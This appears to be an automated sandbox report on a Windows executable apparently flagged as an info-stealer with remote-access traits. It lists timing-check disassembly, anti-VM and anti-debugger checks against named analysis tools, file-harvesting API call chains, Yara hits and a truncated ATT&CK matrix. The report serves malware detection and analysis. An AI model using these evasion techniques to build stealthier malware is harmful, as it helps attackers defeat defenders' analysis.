                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520FEC second address: 520FF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520FF0 second address: 520FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520FF6 second address: 520FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0A8 second address: 52B0CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007FA49D1B33CFh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 jo 00007FA49D1B33CCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0CE second address: 52B0D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0D5 second address: 52B102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA49D1B33D0h 0x0000000e jmp 00007FA49D1B33D4h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531367 second address: 53136D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53136D second address: 531371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531371 second address: 531381 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FA49CDAB576h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52FD51 second address: 52FD5E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop esi 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5303B5 second address: 5303BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5303BB second address: 5303C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5303C1 second address: 5303DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 jc 00007FA49CDAB576h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push ebx 0x0000001b pushad 0x0000001c popad 0x0000001d pop ebx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 530508 second address: 530511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 530511 second address: 53052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA49CDAB576h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FA49CDAB576h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53069A second address: 5306A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5306A3 second address: 5306A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533726 second address: 53372A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536072 second address: 536076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5361CF second address: 5361D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5361D3 second address: 5361D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5361D7 second address: 5361F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA49D1B33D1h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54605F second address: 546063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546063 second address: 54607F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33D6h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54607F second address: 546085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546085 second address: 54608F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA49D1B33C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5406E4 second address: 5406F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5406F0 second address: 5406F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5406F4 second address: 5406F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 553A80 second address: 553ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA49D1B33D6h 0x00000009 jmp 00007FA49D1B33D8h 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 jns 00007FA49D1B33D2h 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007FA49D1B33C6h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563656 second address: 56365A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56365A second address: 563660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 563660 second address: 563669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562544 second address: 562548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562548 second address: 562571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB57Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA49CDAB584h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562571 second address: 562575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562575 second address: 562586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA49CDAB576h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562586 second address: 56258F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56258F second address: 562595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562595 second address: 5625BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA49D1B33D4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5625BB second address: 5625C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5629DA second address: 5629E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5629E3 second address: 5629ED instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA49CDAB576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564DBD second address: 564DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA49D1B33D0h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007FA49D1B33C6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564DDB second address: 564DEA instructions: 0x00000000 rdtsc 0x00000002 js 00007FA49CDAB576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564DEA second address: 564DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567A36 second address: 567A9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB57Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FA49CDAB578h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 sub dword ptr [ebp+122D1E0Dh], esi 0x0000002b push 00000004h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FA49CDAB578h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov edx, dword ptr [ebp+122D2BC9h] 0x0000004d mov dx, cx 0x00000050 push 1C915807h 0x00000055 pushad 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567A9F second address: 567AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567CEE second address: 567CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567DDA second address: 567DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567DDF second address: 567DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567DE5 second address: 567E0C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA49D1B33D9h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56959B second address: 56959F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56959F second address: 5695B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA49D1B33CDh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5695B2 second address: 5695C1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jbe 00007FA49CDAB576h 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5695C1 second address: 5695C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B0B3 second address: 56B0B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B0B9 second address: 56B0DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FA49D1B33C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA49D1B33D6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B0DF second address: 56B0F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA49CDAB581h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48DC41 second address: 48DC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2E189F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 483F71 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2E1906 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_000938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,4_2_000938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00094910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00094910
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0008DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,4_2_0008DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0008E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_0008E430
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0008ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_0008ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00094570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,4_2_00094570
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0008DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0008DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0008BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,4_2_0008BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00093EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,4_2_00093EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0008F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_0008F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_000816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_000816D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00081160 GetSystemInfo,ExitProcess,4_2_00081160
                Source: file.exe, file.exe, 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000004.00000002.1339731462.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000002.1339731462.0000000000D63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarer
                Source: file.exe, 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_4-13236
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_4-13233
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_4-13288
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_4-13248
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_4-13256
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_000845C0 VirtualProtect ?,00000004,00000100,000000004_2_000845C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00099860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00099860
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00099750 mov eax, dword ptr fs:[00000030h]4_2_00099750
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00097850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,4_2_00097850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6488, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00099600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,4_2_00099600
                Source: file.exe, file.exe, 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 8Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,4_2_00097B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00096920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,4_2_00096920
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00097850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,4_2_00097850
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00097A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,4_2_00097A30

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 4.2.file.exe.80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1298921959.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6488, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 4.2.file.exe.80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.1298921959.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6488, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                33
                Virtualization/Sandbox Evasion
                LSASS Memory641
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools
                Security Account Manager33
                Virtualization/Sandbox Evasion
